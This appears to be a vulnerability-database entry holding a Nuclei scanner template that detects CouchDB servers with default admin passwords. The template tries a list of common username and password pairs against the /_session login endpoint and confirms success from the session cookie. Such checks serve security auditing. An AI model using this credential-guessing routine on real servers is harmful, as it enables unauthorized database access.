漏洞描述
CouchDB weak admin credentials were discovered.
couchdb-default-login: CouchDB - Default Login
PoC代码[已公开]
id: couchdb-default-login
info:
name: CouchDB - Default Login
author: thefoggiest
severity: high
description: |
CouchDB weak admin credentials were discovered.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 16
fofa-query: app="APACHE-CouchDB"
product: couchdb
vendor: apache
tags: default-login,couchdb,misconfig,vuln
http:
- raw:
- |
POST /_session HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name={{username}}&password={{password}}
payloads:
username:
- admin
- administrator
- couchdb
- root
password:
- admin
- test
- password
- couchdb
attack: clusterbomb
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"ok":true'
- '"name":"'
- '"roles":['
condition: and
- type: word
part: header
words:
- application/json
- AuthSession=
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100f5181f8e4acb15683fe2d5ec19f007e0e006c8f30bdbf931534fe727c7eaed5c02202545885951638fa89adfd5303b4a564b2474b8d9e31fa53c565adde966f31a67:922c64590222798bb761d5b6d8e72950